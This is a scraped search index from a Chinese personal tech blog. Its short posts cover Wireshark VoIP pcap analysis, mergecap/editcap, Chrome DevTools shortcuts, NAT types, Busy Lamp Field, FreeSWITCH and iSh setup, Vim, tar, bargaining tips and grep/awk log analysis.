http://www.tcpdump.org/pcap.html ","title":"pcap抓包教程"},{"content":"使用tcpdump在服务端抓包,将抓包后的文件在wireshark中打开。\n然后选择:Telephony - VoIP Calls,wireshark可以从抓包文件中提取出SIP呼叫列表。\n呼叫列表页面 在呼叫列表页面,选择一条呼叫记录,点击Flow Sequence, 可以查看该呼叫的SIP时序图。点击Play Stream, 可以播放该条呼叫的声音。\nRTPplay页面有播放按钮,点击播放可以听到通话声音。\n","permalink":"https://wdd.js.org/network/zgftde/","summary":"使用tcpdump在服务端抓包,将抓包后的文件在wireshark中打开。\n然后选择:Telephony - VoIP Calls,wireshark可以从抓包文件中提取出SIP呼叫列表。\n呼叫列表页面 在呼叫列表页面,选择一条呼叫记录,点击Flow Sequence, 可以查看该呼叫的SIP时序图。点击Play Stream, 可以播放该条呼叫的声音。\nRTPplay页面有播放按钮,点击播放可以听到通话声音。","title":"wireshark从pcap中提取语音文件"},{"content":"tcpdump可以在抓包时,按照指定时间间隔或者按照指定的包大小,产生新的pcap文件。用wireshark分析这些包时,往往需要将这些包做合并或者分离操作。\nmergecap 如果安装了Wireshark那么mergecap就会自动安装,可以使用它来合并多个pcap文件。\n// 按照数据包中的时间顺序合并文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap // 按照命令行中的输入数据包文件顺序合并文件 // 不加-a, 可能会导致SIP时序图重复的问题 mergecap -a -w output.pcap input1.pcap input2.pcap input3.pcap editcap 对于一个很大的pcap文件,按照时间范围分割出新的pcap包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 参考 https://blog.csdn.net/qq_19004627/article/details/82287172 ","permalink":"https://wdd.js.org/network/kgrco2/","summary":"tcpdump可以在抓包时,按照指定时间间隔或者按照指定的包大小,产生新的pcap文件。用wireshark分析这些包时,往往需要将这些包做合并或者分离操作。\nmergecap 如果安装了Wireshark那么mergecap就会自动安装,可以使用它来合并多个pcap文件。\n// 按照数据包中的时间顺序合并文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap // 按照命令行中的输入数据包文件顺序合并文件 // 不加-a, 可能会导致SIP时序图重复的问题 mergecap -a -w output.pcap input1.pcap input2.pcap input3.pcap editcap 对于一个很大的pcap文件,按照时间范围分割出新的pcap包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 参考 https://blog.csdn.net/qq_19004627/article/details/82287172 ","title":"wireshark合并和按时间截取pcap文件"},{"content":"本页介绍 Chrome DevTools 中所有键盘快捷键的参考信息。一些快捷键全局可用,而其他快捷键会特定于单一面板。您也可以在提示中找到快捷键。将鼠标悬停在 DevTools 的 UI 元素上可以显示元素的提示。 如果元素有快捷键,提示将包含快捷键。\n访问 DevTools 访问 DevTools 在 Windows 上 在 Mac 上 打开 Developer Tools F12、Ctrl + Shift + I Cmd + Opt + I 打开/切换检查元素模式和浏览器窗口 Ctrl + Shift + C Cmd + Shift + C 打开 Developer Tools 并聚焦到控制台 Ctrl + Shift + J Cmd + Opt + J 检查检查器(取消停靠第一个后按) Ctrl + Shift + I Cmd + Opt + I 全局键盘快捷键 下列键盘快捷键可以在所有 DevTools 面板中使用:\n全局快捷键 Windows Mac 显示一般设置对话框 ?、F1 ? 光标定位到地址栏 Ctrl + L Cmd + L 下一个面板 Ctrl + ] Cmd + ] 上一个面板 Ctrl + [ Cmd + [ 在面板历史记录中后退 Ctrl + Alt + [ Cmd + Opt + [ 在面板历史记录中前进 Ctrl + Alt + ] Cmd + Opt + ] 更改停靠位置 Ctrl + Shift + D Cmd + Shift + D 打开 Device Mode Ctrl + Shift + M Cmd + Shift + M 切换控制台/在设置对话框打开时将其关闭 Esc Esc 刷新页面 F5、Ctrl + R Cmd + R 刷新忽略缓存内容的页面 Ctrl + F5、Ctrl + Shift + R Cmd + Shift + R 在当前文件或面板中搜索文本 Ctrl + F Cmd + F 在所有源中搜索文本 Ctrl + Shift + F Cmd + Opt + F 按文件名搜索(除了在 Timeline 上) Ctrl + O、Ctrl + P Cmd + O、Cmd + P 放大(焦点在 DevTools 中时) Ctrl + + Cmd + Shift + + 缩小 Ctrl + - Cmd + Shift + - 恢复默认文本大小 Ctrl + 0 Cmd + 0 按面板分类的键盘快捷键 Elements Elements 面板 Windows Mac 撤消更改 Ctrl + Z Cmd + Z 重做更改 Ctrl + Y Cmd + Y、Cmd + Shift + Z 导航 向上键、向下键 向上键、向下键 展开/折叠节点 向右键、向左键 向右键、向左键 展开节点 点击箭头 点击箭头 展开/折叠节点及其所有子节点 Ctrl + Alt + 点击箭头图标 Opt + 点击箭头图标 编辑属性 Enter、双击属性 Enter、双击属性 隐藏元素 H H 切换为以 HTML 形式编辑 F2 Styles 边栏 Styles 边栏中可用的快捷键:\nStyles 边栏 Windows Mac 编辑规则 点击 点击 插入新属性 点击空格 点击空格 转到源中样式规则属性声明行 Ctrl + 点击属性 Cmd + 点击属性 转到源中属性值声明行 Ctrl + 点击属性值 Cmd + 点击属性值 在颜色定义值之间循环 Shift + 点击颜色选取器框 Shift + 点击颜色选取器框 编辑下一个/上一个属性 Tab、Shift + Tab Tab、Shift + Tab 增大/减小值 向上键、向下键 向上键、向下键 以 10 为增量增大/减小值 Shift + Up、Shift + Down Shift + Up、Shift + Down 以 10 为增量增大/减小值 PgUp、PgDown PgUp、PgDown 以 100 为增量增大/减小值 Shift + PgUp、Shift + PgDown Shift + PgUp、Shift + PgDown 以 0.1 为增量增大/减小值 Alt + 向上键、Alt + 向下键 Opt + 向上键、Opt + 向下键 Sources Sources 面板 Windows Mac 暂停/继续脚本执行 F8、Ctrl + \\ F8、Cmd + \\ 越过下一个函数调用 F10、Ctrl + ' F10、Cmd + ' 进入下一个函数调用 F11、Ctrl + ; F11、Cmd + ; 跳出当前函数 Shift + F11、Ctrl + Shift + ; Shift + F11、Cmd + Shift + ; 选择下一个调用框架 Ctrl + . Opt + . 选择上一个调用框架 Ctrl + , Opt + , 切换断点条件 点击行号、Ctrl + B 点击行号、Cmd + B 编辑断点条件 右键点击行号 右键点击行号 删除各个单词 Ctrl + Delete Opt + Delete 为某一行或选定文本添加注释 Ctrl + / Cmd + / 将更改保存到本地修改 Ctrl + S Cmd + S 保存所有更改 Ctrl + Alt + S Cmd + Opt + S 转到行 Ctrl + G Ctrl + G 按文件名搜索 Ctrl + O Cmd + O 跳转到行号 Ctrl + P + 数字 Cmd + P + 数字 跳转到列 Ctrl + O + 数字 + 数字 Cmd + O + 数字 + 数字 转到成员 Ctrl + Shift + O Cmd + Shift + O 关闭活动标签 Alt + W Opt + W 运行代码段 Ctrl + Enter Cmd + Enter 在代码编辑器内 代码编辑器 Windows Mac 转到匹配的括号 Ctrl + M 跳转到行号 Ctrl + P + 数字 Cmd + P + 数字 跳转到列 Ctrl + O + 数字 + 数字 Cmd + O + 数字 + 数字 切换注释 Ctrl + / Cmd + / 选择下一个实例 Ctrl + D Cmd + D 撤消上一个选择 Ctrl + U Cmd + U Timeline Timeline 面板 Windows Mac 开始/停止记录 Ctrl + E Cmd + E 保存时间线数据 Ctrl + S Cmd + S 加载时间线数据 Ctrl + O Cmd + O Profiles Profiles 面板 Windows Mac 开始/停止记录 Ctrl + E Cmd + E 控制台 控制台快捷键 Windows Mac 接受建议 向右键 向右键 上一个命令/行 向上键 向上键 下一个命令/行 向下键 向下键 聚焦到控制台 Ctrl + ` Ctrl + ` 清除控制台 Ctrl + L Cmd + K、Opt + L 多行输入 Shift + Enter Ctrl + Return 执行 Enter Return Device Mode Device Mode 快捷键 Windows Mac 双指张合放大和缩小 Shift + 滚动 Shift + 滚动 抓屏时 抓屏快捷键 Windows Mac 双指张合放大和缩小 Alt + 滚动、Ctrl + 点击并用两个手指拖动 Opt + 滚动、Cmd + 点击并用两个手指拖动 检查元素工具 Ctrl + Shift + C Cmd + Shift + C ","permalink":"https://wdd.js.org/posts/2020/11/muk33s/","summary":"本页介绍 Chrome DevTools 中所有键盘快捷键的参考信息。一些快捷键全局可用,而其他快捷键会特定于单一面板。您也可以在提示中找到快捷键。将鼠标悬停在 DevTools 的 UI 元素上可以显示元素的提示。 如果元素有快捷键,提示将包含快捷键。\n访问 DevTools 访问 DevTools 在 Windows 上 在 Mac 上 打开 Developer Tools F12、Ctrl + Shift + I Cmd + Opt + I 打开/切换检查元素模式和浏览器窗口 Ctrl + Shift + C Cmd + Shift + C 打开 Developer Tools 并聚焦到控制台 Ctrl + Shift + J Cmd + Opt + J 检查检查器(取消停靠第一个后按) Ctrl + Shift + I Cmd + Opt + I 全局键盘快捷键 下列键盘快捷键可以在所有 DevTools 面板中使用:","title":"Chrome 键盘快捷键参考"},{"content":"when considered in conjunction with deployment architectures that include 1:M and M:N combinations of Application Servers and Media Servers\nMedia Resource Broker (MRB) entity, which manages the availability of Media Servers and the media resource demands of Application Servers. The document includes potential deployment options for an MRB and appropriate interfaces to Application Servers and Media Servers.\n","permalink":"https://wdd.js.org/posts/2020/11/ig536h/","summary":"when considered in conjunction with deployment architectures that include 1:M and M:N combinations of Application Servers and Media Servers\nMedia Resource Broker (MRB) entity, which manages the availability of Media Servers and the media resource demands of Application Servers. The document includes potential deployment options for an MRB and appropriate interfaces to Application Servers and Media Servers.","title":"RFC 6917 笔记"},{"content":"4种NAT类型 NAT类型 接收数据前是否要先发送数据 有没有可能检测下一个IP:PORT对是否打开 是否限制发包目的的IP:PORT 全锥型 no yes no 限制锥型 yes yes only IP 端口限制型 yes yes yes 对称型 yes no yes NAT穿透 • STUN: Simple traversal of UDP over NAT• TURN: Traversal of UDP over Relay NAT• ALG: Application Layer Gateways• MANUAL: Manual configuration (port forwarding)• UPNP: Universal Plug and Play\n","permalink":"https://wdd.js.org/posts/2020/11/nh68ws/","summary":"4种NAT类型 NAT类型 接收数据前是否要先发送数据 有没有可能检测下一个IP:PORT对是否打开 是否限制发包目的的IP:PORT 全锥型 no yes no 限制锥型 yes yes only IP 端口限制型 yes yes yes 对称型 yes no yes NAT穿透 • STUN: Simple traversal of UDP over NAT• TURN: Traversal of UDP over Relay NAT• ALG: Application Layer Gateways• MANUAL: Manual configuration (port forwarding)• UPNP: Universal Plug and Play","title":"NAT"},{"content":"What Is a Busy Lamp Field (BLF) and Why Do You Need It? Busy lamp field is a presence indicator that allows you to see who in your organization is available (or not) for a phone call at any given time.\nThe term “busy lamp field” sounds a bit more involved than it really is. Put simply, it just means the ability to see who in your organization is available or not for a phone call at any given time.\nBusy Lamp Field Overview Maybe this analogy will help: You’re in New York City, and you need to flag down a yellow cab. (Let’s pretend Uber isn’t a thing for a minute.) The cabs with their roof light on are available. The cabs with their light off are occupied. If the cab’s roof light is lit up—but not the number, just the words “off duty”—they’re unavailable. Make sense? BLF is much the same, just for office phones: a light indication of who’s available to talk, who’s on the phone, and who’s “off duty” for the moment. If you’re familiar with the term “presence,” BLF is the same thing, just specific to phone extensions. So why do you want these flashing lights in your line of sight? They allow you to monitor your coworkers in real time during the workday. Now, before you go all 1984 on us, let us clarify how this isn’t a Big Brother type of monitoring: BLF is a vital tool for anyone whose job relies on phone calls—think sales, reception, or support. Imagine having to physically check if someone was available for a call. Besides being a wildly inefficient way to spend your day, it also means the caller is left hanging on hold for however long it takes you to find your coworker. And what do you do if the coworker in question is in a different office, in a different state, or even in a different country? An active busy lamp field eliminates this problem altogether. Busy lamp field lets you know who’s available for a call transfer with a single glance.So how does this work in an actual office setting?Take Michael in Sales, for example. He’s on the phone with a customer who has a very specific question that’s best answered by Malcolm. Michael can glance at his OnSIP app screen and immediately see if Malcolm is available, on a call, or logged out at that exact moment. If available, Michael can immediately transfer the customer over to Malcolm. If unavailable, Michael can take a message, send the customer to Malcolm’s voicemail, or suggest another agent who is available.\nBusy Lamp Field on Desk Phones: BLF Keys Whether your main desk phone knowledge comes from reruns of The Office or you use one every day, you’ve undoubtedly seen tiny lights blinking on a panel of side buttons. While each phone is unique in its setup, nearly all desk phones have these buttons—BLF keys—to the side of a small screen that you can connect to various extensions. It’s up to you which extensions you configure on your phone—other lines of your own, the coworkers you call the most, people to whom you tend to transfer phone calls, or even your boss. The BLF keys will show different colors, regularly green and red or orange, based on which extensions are currently in use so that you always have an overview of who’s available.If you’d like to set up BLF on your desk phone, our Knowledgebase will help you configure the OnSIP specifics. Each phone has its own guide to colors, flashing status, and configuration, so follow the instructions provided by your particular phone model. BLF keys light up red to indicate a line is in use.\nBusy Lamp Field in the OnSIP Softphone App: BLF Presence The OnSIP app takes a desk phone’s busy lamp field and upgrades it for our current technological norms. Most of us here at OnSIP use our desktop app rather than physical phones. Because we have a contacts panel on the left side of the app, presence is automatically shown for everyone. As an added bonus, the apps also show you how long someone’s been on a call. Here’s how busy lamp field appears in the OnSIP app:\nGreen: Available Orange: Away Cerise: Busy Desk phones have a limited number of BLF keys to configure, so you have to pick and choose which colleagues will be visible to you or constantly switch it around based on daily needs. With the OnSIP softphone, everyone is visible in a single glance.To give you an idea of how they differ, here’s a comparison view of BLF as it appears in the app and on a desk phone: How BLF Affects Real-Time Communications WebRTC is a huge part of telecom innovations right now, and OnSIP is no exception. We’ve launched **sayso, **a web-based calling solution that lets your site visitors call or video chat straight from any webpage. It’s a fantastic business tool, but we’ll let you read about that elsewhere—this post is all about busy lamp field, after all.Real-time communication is a wonderful thing, and it wouldn’t be quite as functional without busy lamp field. If sayso couldn’t tell which agents were available to chat, how would it function? Exactly. (We assumed you answered, “It wouldn’t” in your head.) We mentioned above how BLF is simply a phone-specific type of presence—it tells you that a phone is plugged in and can take a call—and certainly the most common form of the feature.Presence factors into how sayso works but with a few key differences. Typical BLF isn’t quite advanced enough for sayso—it requires a more enhanced form of presence. We designed our proprietary presence system to take the typical BLF “available” status to the next level and instead say, “Yes, this person is sitting at their phone at this exact moment and is ready to take your call.” Presence is an essential part of sayso.Busy lamp field is an integral part of the workday for anyone who needs to call a coworker or whose job description heavily features the word “call.” Whether you prefer a desktop interface or a physical handset balanced against your ear, you should be able to glance at your phone of choice and see which coworkers are available at any time. The name might be a mouthful, but that’s probably why it’s just a visual cue anyway.\n参考资料 https://www.onsip.com/voip-resources/voip-fundamentals/what-is-a-busy-lamp-field-blf-and-why-do-you-need-it PDF附件 GXV32xx_broadworks_BLF_Guide.pdf 1501643005322.pdf Quick_Setup_BLF_List_on_Yealink_IP_Phones_with_BroadSoft_UC_ONE_v1.0.pdf ","permalink":"https://wdd.js.org/opensips/ch9/blf/","summary":"What Is a Busy Lamp Field (BLF) and Why Do You Need It? Busy lamp field is a presence indicator that allows you to see who in your organization is available (or not) for a phone call at any given time.\nThe term “busy lamp field” sounds a bit more involved than it really is. Put simply, it just means the ability to see who in your organization is available or not for a phone call at any given time.","title":"BLF指示灯"},{"content":"1. 将源码包上传到服务器, 并解压 安装依赖 apt update apt install autoconf \\ libtool \\ libtool-bin \\ libjpeg-dev \\ libsqlite3-dev \\ libspeex-dev libspeexdsp-dev \\ libldns-dev \\ libedit-dev \\ libtiff-dev \\ libavformat-dev libswscale-dev libsndfile-dev \\ liblua5.1-0-dev libcurl4-openssl-dev libpcre3-dev libopus-dev libpq-dev 配置 ./bootstrap.sh ./configure make make \u0026amp;\u0026amp; make install 参考:https://www.cnblogs.com/MikeZhang/p/RaspberryPiInstallFreeSwitch.html\n","permalink":"https://wdd.js.org/posts/2020/11/gtrrng/","summary":"1. 将源码包上传到服务器, 并解压 安装依赖 apt update apt install autoconf \\ libtool \\ libtool-bin \\ libjpeg-dev \\ libsqlite3-dev \\ libspeex-dev libspeexdsp-dev \\ libldns-dev \\ libedit-dev \\ libtiff-dev \\ libavformat-dev libswscale-dev libsndfile-dev \\ liblua5.1-0-dev libcurl4-openssl-dev libpcre3-dev libopus-dev libpq-dev 配置 ./bootstrap.sh ./configure make make \u0026amp;\u0026amp; make install 参考:https://www.cnblogs.com/MikeZhang/p/RaspberryPiInstallFreeSwitch.html","title":"树莓派安装fs 1.10"},{"content":"为了能够在所有环境达到一致且极致的编程体验。我已经准备了好长的时间,从vscode切换到vim上做开发。\n我的切换计划分为多个阶段:\n尝试:使用vim编辑单个文件 练习:在vscode上安装vim插件,用了一段时间,感觉很别扭。 徘徊:尝试使用vim作为开发,用了一段时间后,我发现开发速度相比于vim上很慢。特别是多文件编辑,文件创建。没有vscode编辑器的那种文件侧边栏,感觉写代码不太真实,云里雾里的感觉。然后我就又切换到vscode上开发。 精进:我一直认为我vim已经学的差不多了,但是用vim的时候,总是感觉使不上劲。我觉得我没有系统的学习vim。然后我就去找了vim方面的书籍《vim实用技巧》。这本书我看过第一遍,我觉得自己之前对vim的理解太过肤浅。然后我就找机会从书中学习的技巧练习写代码。这本书我看了不下于三遍,每次看都有收获。每每遇到困惑的地方,我就会随手去查查。然后做总结。 切换:从今年双十一,我开始使用vim做开发,直到今天,我一直都没有使用vscode, 并且我也把vscode卸载了。我之所以敢于卸载vscode, 是因为我觉得我在vim上开发的效率,已经高于vscode。 熟练运用vim之后,我发现在vim上切换文件,打开文件还是创建文件,速度非常快,完全不需要鼠标点击。\n除了没有右边的代码预览视图,vim功能都有。而且我越用越觉得vim的netrw插件要比vscode左边栏的文件树窗口好用。\n还有代码搜索,我使用了ack, 用这个命令搜索关键词,简直快的飞起。\n","permalink":"https://wdd.js.org/vim/from-vscode-to-vim/","summary":"为了能够在所有环境达到一致且极致的编程体验。我已经准备了好长的时间,从vscode切换到vim上做开发。\n我的切换计划分为多个阶段:\n尝试:使用vim编辑单个文件 练习:在vscode上安装vim插件,用了一段时间,感觉很别扭。 徘徊:尝试使用vim作为开发,用了一段时间后,我发现开发速度相比于vim上很慢。特别是多文件编辑,文件创建。没有vscode编辑器的那种文件侧边栏,感觉写代码不太真实,云里雾里的感觉。然后我就又切换到vscode上开发。 精进:我一直认为我vim已经学的差不多了,但是用vim的时候,总是感觉使不上劲。我觉得我没有系统的学习vim。然后我就去找了vim方面的书籍《vim实用技巧》。这本书我看过第一遍,我觉得自己之前对vim的理解太过肤浅。然后我就找机会从书中学习的技巧练习写代码。这本书我看了不下于三遍,每次看都有收获。每每遇到困惑的地方,我就会随手去查查。然后做总结。 切换:从今年双十一,我开始使用vim做开发,直到今天,我一直都没有使用vscode, 并且我也把vscode卸载了。我之所以敢于卸载vscode, 是因为我觉得我在vim上开发的效率,已经高于vscode。 熟练运用vim之后,我发现在vim上切换文件,打开文件还是创建文件,速度非常快,完全不需要鼠标点击。\n除了没有右边的代码预览视图,vim功能都有。而且我越用越觉得vim的netrw插件要比vscode左边栏的文件树窗口好用。\n还有代码搜索,我使用了ack, 用这个命令搜索关键词,简直快的飞起。","title":"从VSCode切换到VIM"},{"content":"我在家里的时候,大部分时间用iPad远程连接到服务端做开发。虽然也是蛮方便的,但是每年都需要买个云服务器,也是一笔花费,最近看到一个App, 可以在手机上直接运行一个Linux环境,试了一下,果然还不错。下面记录一下安装过程。\nstep1: 下载iSh step2: 安装apk 这个软件下载之后打开,就直接进到shell界面,虽然它是一个基于alpine的环境,但是没有apk, 我们需要手工安装这个包管理工具。\nwget -qO- http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86/apk-tools-static-2.10.5-r1.apk | tar -xz sbin/apk.static \u0026amp;\u0026amp; ./sbin/apk.static add apk-tools \u0026amp;\u0026amp; rm sbin/apk.static \u0026amp;\u0026amp; rmdir sbin 2\u0026gt; /dev/null 温馨提示:在iSh的右下角,有个按钮是粘贴按钮。\nstep3: apk update 虽然安装了apk, 但是不更新的话,可能很多安装包都没有,所以最好先更新。\n在更新之前。最好执行下面的命令,把apk的源换成清华的,这样之后的安装软件会比较快点。\nsed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories apk update step4: 安装各种开发工具 git zsh tmux vim\u0026hellip; apk add git zsh tmux vim step5: 安装oh-my-zsh 这是必不可少的神器 因为从github上克隆oh-my-zsh可能会很慢,所以我用了码云上的一个仓库。 这样速度就会很快了。\ngit clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc chsh -s $(which zsh) step6: 安装nodejs python golang等。 apk add nodejs python3 下面看到输出了nodejs和python的版本,说明安装成功。另外ish支持换肤的。之前的白色的,下面的是黑色的。\nstep7: vim写个hello world吧 vim index.html\nstep8: 监听端口可以吗? 写web服务器就不赘述了,直接用python自带的静态文件服务器吧。\npython3 -m http.server 这会打开一个静态文件服务器,监听在8000端口。\n我们打开自带的safari浏览器看看,能否访问这个页面。\nhello world出现。完美!!!\nstep9: 后台运行 后台运行的思路是:\n使用tmux 创建一个新的sesssion 这这个session中执行下面的命令。下面的命令实际上是获取你的位置信息,当App切到后台时,位置在后台刷新,保证ish能够后台运行。当然这需要给予位置权限。你也可以收工输入 cat /dev/location 看看会发生什么。 cat /dev/location \u0026gt; /dev/null \u0026amp; FAQ 有些人会问,ish不支持多标签页,怎么同时做很多事情呢? 问这个问题,说明你还没用过tmux这个工具,建议你先学学tmux。 ","permalink":"https://wdd.js.org/posts/2020/11/kfl9zd/","summary":"我在家里的时候,大部分时间用iPad远程连接到服务端做开发。虽然也是蛮方便的,但是每年都需要买个云服务器,也是一笔花费,最近看到一个App, 可以在手机上直接运行一个Linux环境,试了一下,果然还不错。下面记录一下安装过程。\nstep1: 下载iSh step2: 安装apk 这个软件下载之后打开,就直接进到shell界面,虽然它是一个基于alpine的环境,但是没有apk, 我们需要手工安装这个包管理工具。\nwget -qO- http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86/apk-tools-static-2.10.5-r1.apk | tar -xz sbin/apk.static \u0026amp;\u0026amp; ./sbin/apk.static add apk-tools \u0026amp;\u0026amp; rm sbin/apk.static \u0026amp;\u0026amp; rmdir sbin 2\u0026gt; /dev/null 温馨提示:在iSh的右下角,有个按钮是粘贴按钮。\nstep3: apk update 虽然安装了apk, 但是不更新的话,可能很多安装包都没有,所以最好先更新。\n在更新之前。最好执行下面的命令,把apk的源换成清华的,这样之后的安装软件会比较快点。\nsed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories apk update step4: 安装各种开发工具 git zsh tmux vim\u0026hellip; apk add git zsh tmux vim step5: 安装oh-my-zsh 这是必不可少的神器 因为从github上克隆oh-my-zsh可能会很慢,所以我用了码云上的一个仓库。 这样速度就会很快了。\ngit clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc chsh -s $(which zsh) step6: 安装nodejs python golang等。 apk add nodejs python3 下面看到输出了nodejs和python的版本,说明安装成功。另外ish支持换肤的。之前的白色的,下面的是黑色的。","title":"在iPhone iPad上搭建Linux本地开发环境"},{"content":"环境mac\n# 这个目录打包之后,内部的顶层目录是dist, 解压之后,有可能覆盖到以前的dist tar -zcvf demo.tar.gz dist/ # 使用这个命令,顶层目录将会被修改成demo-0210 tar -s /^dist/demo-0210/ -zcvf demo.tar.gz dist/ ","permalink":"https://wdd.js.org/posts/2020/10/sxuez4/","summary":"环境mac\n# 这个目录打包之后,内部的顶层目录是dist, 解压之后,有可能覆盖到以前的dist tar -zcvf demo.tar.gz dist/ # 使用这个命令,顶层目录将会被修改成demo-0210 tar -s /^dist/demo-0210/ -zcvf demo.tar.gz dist/ ","title":"tar打包小技巧: 替换根目录"},{"content":"只要有价格,就可以讲价 ****只要有价格,就可以讲价。**但是也有例外,例如超市,超市的东西明码标价。售货员一般不会管价格。\n其次,要和能管价的人谈 **其次,要和能管价的人谈。 有些人不管价格,讲多少都没用。\n50%理论 第一次喊价以后,一般只会抬价,而不会降价,所以务必要重视。\n例如一束花,店家要价80,实际这束花成本20。如果你第一喊价70,那你只能优惠小于10元。\n第一次喊价要低于心理价位,这样才有留够上涨的空间 **50%理论 ,**一般你的第一次出价可以按照卖家要价的50%开始喊价。然后再利用各种计策。提高价格,这里最重要的是摸出买家的底价,高于这个低价,买家才会卖。80元的花,你的第一次出价可以喊40元。 脸皮要厚,脸皮厚,才能要更多优惠 ","permalink":"https://wdd.js.org/posts/2020/10/ahtqix/","summary":"只要有价格,就可以讲价 ****只要有价格,就可以讲价。**但是也有例外,例如超市,超市的东西明码标价。售货员一般不会管价格。\n其次,要和能管价的人谈 **其次,要和能管价的人谈。 有些人不管价格,讲多少都没用。\n50%理论 第一次喊价以后,一般只会抬价,而不会降价,所以务必要重视。\n例如一束花,店家要价80,实际这束花成本20。如果你第一喊价70,那你只能优惠小于10元。\n第一次喊价要低于心理价位,这样才有留够上涨的空间 **50%理论 ,**一般你的第一次出价可以按照卖家要价的50%开始喊价。然后再利用各种计策。提高价格,这里最重要的是摸出买家的底价,高于这个低价,买家才会卖。80元的花,你的第一次出价可以喊40元。 脸皮要厚,脸皮厚,才能要更多优惠 ","title":"讲价的学问"},{"content":"预处理 从一个文件中过滤 grep key file ➜ grep ERROR a.log 12:12 ERROR:core bad message 从多个文件中过滤 grep key file1 fil2 多文件搜索,指定多个文件 grep key *.log 使用正则的方式,匹配多个文件 grep -h key *.log 可以使用-h, 让结果中不出现文件名。默认文件名会出现在匹配行的前面。 ➜ grep ERROR a.log b.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message ➜ grep ERROR *.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message 多个关键词过滤 grep -e key1 -e key2 file 使用-e参数,可以制定多个关键词 ➜ grep -e ERROR -e INFO a.log 12:12 ERROR:core bad message 12:12 INFO:parse bad message1 正则过滤 grep -E REG file 下面例子是匹配db:后跟数字部分 ➜ grep -E \u0026#34;db:\\d+ \u0026#34; a.log 12:14 WARNING:db:1 bad message 12:14 WARNING:db:21 bad message 12:14 WARNING:db:2 bad message1 12:14 WARNING:db:4 bad message 仅输出匹配字段 grep -o args 使用-o参数,可以仅仅输出匹配项,而不是整个匹配的行 ➜ go-tour grep -o -E \u0026#34;db:\\d+ \u0026#34; a.log db:1 db:21 db:2 db:4 统计关键词出现的行数 例如一个nginx的access.log, 我们想统计其中的POST的个数,和OPTIONS的个数。\n先写一个脚本,名为method.ack\nBEGIN{ post_lines = 0 options_lines = 0 printf \u0026#34;start\\n\u0026#34; } /POST/ { post_lines++ } /OPTIONS/ { options_lines++ } END { printf \u0026#34;post_lines: %s, \\noptions_lines: %s \\n\u0026#34;,post_lines,options_lines } 然后执行\nack -f method.ack access.log 时间处理 比如给你一个nginx的access.log, 让你按照每秒,每分钟统计下请求量的大小,如何做呢?\n首先取出日志行中的时间,然后从事件中取出秒 awk '{print $4}' 10.32.104.47 - - [29/Sep/2020:06:43:53 +0800] \u0026#34;OPTIONS url HTTP/1.1\u0026#34; 200 0 \u0026#34;\u0026#34; \u0026#34;Mozi Safari/537.36\u0026#34; \u0026#34;-\u0026#34; awk \u0026#39;{print $4}\u0026#39; access.log [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 那如何取出分钟呢?使用ack的字符串函数, substr(str, startIndex, len) awk \u0026#39;{print substr($4,0,18)}\u0026#39; access.log [29/Sep/2020:05:23 [29/Sep/2020:05:23 对输出结果进行 uniq -c 统计出现重复行的次数。即单位事件内时间重复的次数,也就是单位事件内的请求数。\n625 [29/Sep/2020:06:36 625 [29/Sep/2020:06:37 624 [29/Sep/2020:06:38 624 [29/Sep/2020:06:39 651 [29/Sep/2020:06:40 626 [29/Sep/2020:06:41 624 [29/Sep/2020:06:42 560 [29/Sep/2020:06:43 排序与去重 sort 按照某一列去重 按照多列去重 vim专项练习 :set nowrap 取消自动换行 :set nu 显示行号 :%!awk '{$2=\u0026quot;\u0026quot;;print $0}' 删除指定的列 :%!awk '{print $3,$4}' 挑选指定的列 :g/key/d 删除匹配的行 :v/key/d 删除不匹配的行 :g/key/p 仅仅显示匹配的行 :v/key/p 仅仅显示不匹配的行 /key1\\|key2 查找多个关键词 :nohl 移除高亮 核武器 lnav 过滤 统计图 select cs_method , count( cs_method ) FROM access_log group by cs_method ","permalink":"https://wdd.js.org/posts/2020/04/qlqhiv/","summary":"预处理 从一个文件中过滤 grep key file ➜ grep ERROR a.log 12:12 ERROR:core bad message 从多个文件中过滤 grep key file1 fil2 多文件搜索,指定多个文件 grep key *.log 使用正则的方式,匹配多个文件 grep -h key *.log 可以使用-h, 让结果中不出现文件名。默认文件名会出现在匹配行的前面。 ➜ grep ERROR a.log b.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message ➜ grep ERROR *.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message 多个关键词过滤 grep -e key1 -e key2 file 使用-e参数,可以制定多个关键词 ➜ grep -e ERROR -e INFO a.log 12:12 ERROR:core bad message 12:12 INFO:parse bad message1 正则过滤 grep -E REG file 下面例子是匹配db:后跟数字部分 ➜ grep -E \u0026#34;db:\\d+ \u0026#34; a.","title":"[todo]锋利的linux日志分析命令"},{"content":"虽然flash已经几乎被淘汰了,但是在某些老版本的IE里面,依然有他们顽强的身影。\n使用flash 模拟websocket, 有时会遇到下面的问题。虽然flash安全策略文件已经部署,但是客户端依然报错。\n[WebSocket] cannot connect to Web Socket Server at \u0026hellip; make sure the server is runing and Flash policy file is correct placed.\n解决方案:\n在**%WINDIR%\\System32\\Macromed\\Flash**下创建一个名为mms.cfg的文件, 如果文件已经存在,则不用创建。\n文件内容如下:\nDisableSockets=0 